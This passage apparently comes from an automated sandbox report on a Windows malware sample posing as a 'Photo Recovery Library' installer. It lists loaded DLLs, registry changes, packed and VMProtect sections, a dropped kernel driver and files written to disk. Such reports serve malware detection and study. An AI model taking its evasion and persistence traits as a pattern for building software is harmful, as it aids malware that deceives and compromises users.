            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpWindow found: window name: TMainFormJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Recovery Library_is1Jump to behavior

Data Obfuscation

Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Unpacked PE file: 0.2.dxRwXy19pq.exe.400000.0.unpack "YR:EW;b.bbb:EW;Unknown_Section2:W; vs "YR:ER;b.bbb:ER;Unknown_Section2:W;
Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Unpacked PE file: 14.2.photorecoverylib59.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Unpacked PE file: 14.2.photorecoverylib59.exe.400000.0.unpack
Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00402890 LoadLibraryA,GetProcAddress,GetCurrentThread,FreeLibrary, 0_2_00402890
Source: initial sample | Static PE information: section where entry point is pointing to: b.bbb
Source: dxRwXy19pq.exe | Static PE information: section name: "YR
Source: dxRwXy19pq.exe | Static PE information: section name: b.bbb
Source: dxRwXy19pq.exe | Static PE information: section name: bbS
Source: VzUtW_3288.sys.5.dr | Static PE information: section name: css0
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /4
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /19
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /35
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /51
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /63
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /77
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /89
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /102
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /113
Source: is-N40N4.tmp.13.dr | Static PE information: section name: /124
Source: sqlite3.dll.14.dr | Static PE information: section name: /4
Source: sqlite3.dll.14.dr | Static PE information: section name: /19
Source: sqlite3.dll.14.dr | Static PE information: section name: /35
Source: sqlite3.dll.14.dr | Static PE information: section name: /51
Source: sqlite3.dll.14.dr | Static PE information: section name: /63
Source: sqlite3.dll.14.dr | Static PE information: section name: /77
Source: sqlite3.dll.14.dr | Static PE information: section name: /89
Source: sqlite3.dll.14.dr | Static PE information: section name: /102
Source: sqlite3.dll.14.dr | Static PE information: section name: /113
Source: sqlite3.dll.14.dr | Static PE information: section name: /124
Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Code function: 2_2_00007FF88B4C4802 push eax; ret 2_2_00007FF88B4C4811
Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Code function: 2_2_00007FF88B4C00BD pushad ; iretd 2_2_00007FF88B4C00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF88A9FD2A5 pushad ; iretd 10_2_00007FF88A9FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF88AB100BD pushad ; iretd 10_2_00007FF88AB100C1
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_004065C8 push 00406605h; ret 12_2_004065FD
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_004040B5 push eax; ret 12_2_004040F1
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00408104 push ecx; mov dword ptr [esp], eax 12_2_00408109
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00404185 push 00404391h; ret 12_2_00404389
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00404206 push 00404391h; ret 12_2_00404389
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_0040C218 push eax; ret 12_2_0040C219
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_004042E8 push 00404391h; ret 12_2_00404389
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00404283 push 00404391h; ret 12_2_00404389
Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00408F38 push 00408F6Bh; ret 12_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004849F4 push 00484B02h; ret 13_2_00484AFA
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0040995C push 00409999h; ret 13_2_00409991
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00458060 push 00458098h; ret 13_2_00458090
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004860E4 push ecx; mov dword ptr [esp], ecx 13_2_004860E9
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004062C4 push ecx; mov dword ptr [esp], eax 13_2_004062C5
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004783C8 push ecx; mov dword ptr [esp], edx 13_2_004783C9
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004104F0 push ecx; mov dword ptr [esp], edx 13_2_004104F5
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00412938 push 0041299Bh; ret 13_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0049AD44 pushad ; retf 13_2_0049AD53
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0040CE48 push ecx; mov dword ptr [esp], edx 13_2_0040CE4A
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00459378 push 004593BCh; ret 13_2_004593B4
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0040F3A8 push ecx; mov dword ptr [esp], edx 13_2_0040F3AA
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0040546D push eax; ret 13_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004434B4 push ecx; mov dword ptr [esp], ecx 13_2_004434B8
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0040553D push 00405749h; ret 13_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004055BE push 00405749h; ret 13_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0040563B push 00405749h; ret 13_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004056A0 push 00405749h; ret 13_2_00405741
Source: dxRwXy19pq.exe | Static PE information: section name: b.bbb entropy: 7.9262045404820025
Source: VzUtW_3288.sys.5.dr | Static PE information: section name: .text entropy: 7.166404761662683
Source: is-G5VHU.tmp.13.dr | Static PE information: section name: .text entropy: 6.90903234258047

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive014_2_02D3E8B2
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\VzUtW_3288.sysJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libGLESv2.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuuc51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcp100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9CIKO.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeFile created: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9TUU2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-G5VHU.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-N40N4.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeFile created: C:\ProgramData\PhotoRecoveryLib\sqlite3.dllJump to dropped file
